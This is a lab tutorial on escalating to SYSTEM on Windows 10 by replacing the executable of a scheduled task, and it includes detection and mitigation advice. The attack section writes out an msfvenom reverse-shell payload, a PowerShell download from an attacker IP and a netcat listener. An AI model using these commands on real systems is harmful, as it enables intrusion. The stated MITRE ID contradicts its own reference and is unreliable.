An attacker may exploit the Windows Task Scheduler to schedule malicious programmes for initial or recurrent execution. For persistence purposes, an attacker may utilise Windows Task Scheduler to launch applications at system startup or on a scheduled basis. Additionally, the Windows Task Scheduler may be utilised to execute remote code to run a process under the context of a specified account for Privilege Escalation.

Table of Content

• Task Scheduler
• Misconfigured Scheduled Task/Job
• Prerequisite
• Lab Setup
• Abusing Schedule Task/Job
• Detection
• Mitigation

Task Scheduler

An automatic job can be scheduled using the Task Scheduler service. When you use this service, you may set up any programme to run at a date and time that works best for you. Task Scheduler checks the time or event criteria you specify and then runs the task when those conditions are fulfilled.

Misconfigured Scheduled Task/Job

An attacker can perform execution, persistence or privilege escalation by abusing any script, program, or service that is running automatically through the task scheduler.

Mitre ID: T1573.005
Tactics: Execution, Persistence, Privilege Escalation

Platforms: Windows

Prerequisite

Target Machine: Windows 10

Attacker Machine: Kali Linux

Condition: Compromise the target machine with low privilege access either using Metasploit or Netcat, etc.

Objective: Escalate the NT Authority /SYSTEM privileges for a low privileged user by exploiting the Scheduled Task/Job.

Lab Setup

Run Task Scheduler from inside the program menu.

Step1: Explore the Task Schedule Library to create a new Task.

Step2: Assign a task for the logged user to be executed as the highest privileges.

Step3: Choose the Trigger option to initiate a scheduled task/job.

Step4: Here we have scheduled the task for recurrence occurrence.

Step5: When you create a task, you must specify the action that will occur when your task starts.

Step6: Specify the type of action to be performed by a scheduled task. For example schedule backup of a system through some executable program.

Step7: Thus schedule tasks will be triggered every day at a specific time for taking backup or schedule job to define as action.

Abusing Schedule Task/Job

Step8: An attacker can escalate privileges by exploiting Schedule Task/Job. Following an initial foothold, we can query to obtain the list for the scheduled task.

schtasks /query /fo LIST /V

This helps an attack to understand which application is attached to execute Job at what time.

To get a reverse shell as NT Authority SYSTEM, let’s create a malicious exe file that could be executed through a scheduled task.  Using Msfvenom we have created an exe file that was injected into the target system.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > shell.exe

To abuse the scheduled Task, the attacker will either modify the application by overwriting it or may replace the original file from the duplicate. To insert a duplicate file in the same directory, we rename the original file as a file.bak.

Then downloaded malicious file.exe in the same directory with the help of wget command.

powershell wget 192.168.1.3/shell.exe –o file.exe

Once the duplicate file.exe is injected in the same directory then, the file.exe will be executed automatically through Task Scheduler. As attackers make sure that netcat listener must be at listening mode for obtaining reverse connection for privilege shell.

nc -lvp 8888
whoami /priv

Detection

1. Tools such as Sysinternals Autoruns can detect system changes like showing presently scheduled jobs.
2. Tools like TCPView & Process Explore may help to identify remote connections for suspicious services or processes.
3. View Task Properties and History: To view a task’s properties and history by using a command line

Schtasks /Query /FO LIST /V

4. Enable the “Microsoft-Windows-TaskScheduler/Operational” configuration inside the event logging service to report scheduled task creation and updates.

Mitigation

1. Perform an audit scan to find out week or misconfiguration with the help of automated script using tools such as WinPeas, SharpUp, etc. Read more from here “Window Privilege Escalation: Automated Script”.
2. Make sure the scheduled task should not be run as SYSTEM.

Configure scheduled tasks to execute as the authenticated account instead of SYSTEM. The associated Registry key is located at HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl.

The setting can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled

Reference:

https://attack.mitre.org/techniques/T1053/002/

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here